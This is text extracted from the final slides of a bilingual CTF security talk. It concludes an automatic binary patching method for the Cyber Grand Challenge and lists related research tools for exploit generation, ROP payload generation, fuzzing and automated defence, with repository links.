![Page 76: Ctf hello,world!](https://reader034.vdocuments.net/reader034/viewer/2022052302/587a71e91a28ab8a2a8b8043/html5/thumbnails/76.jpg)
Conclusions
• WeproposeanautomaticbinarypatchmethodforCGC
• Faultlocalization• BinaryPatch
• Ourmethodcansucceedinpatchingfivechallengebinaries
• Onlyfailinoneavailabilitytest• Allsecuritytestspass
76
![Page 77: Ctf hello,world!](https://reader034.vdocuments.net/reader034/viewer/2022052302/587a71e91a28ab8a2a8b8043/html5/thumbnails/77.jpg)
相關系統
• CRAX• AutomaticExploitGeneration(Non-Web攻擊生成)• https://github.com/SQLab/CRAX
• CRAXWeb• WebExploitGeneration (Web攻擊生成)• https://github.com/SQLab/CRAXWeb
• Ropchain (ROP bypassingASLR,DEPpayload生成)• ROPPayloadGeneration• https://github.com/SQLab/ropchain
• CRAXfuzz• SymbolicFuzzingFramework (符號形式之模糊測試)
• CRAXcrs• AutomaticDefensebyFaultLocalizationandDynamicPatch(錯誤定位與自動修補達成自動化
防禦)
77
![Page 78: Ctf hello,world!](https://reader034.vdocuments.net/reader034/viewer/2022052302/587a71e91a28ab8a2a8b8043/html5/thumbnails/78.jpg)
Q&AThanksforyourattention!
78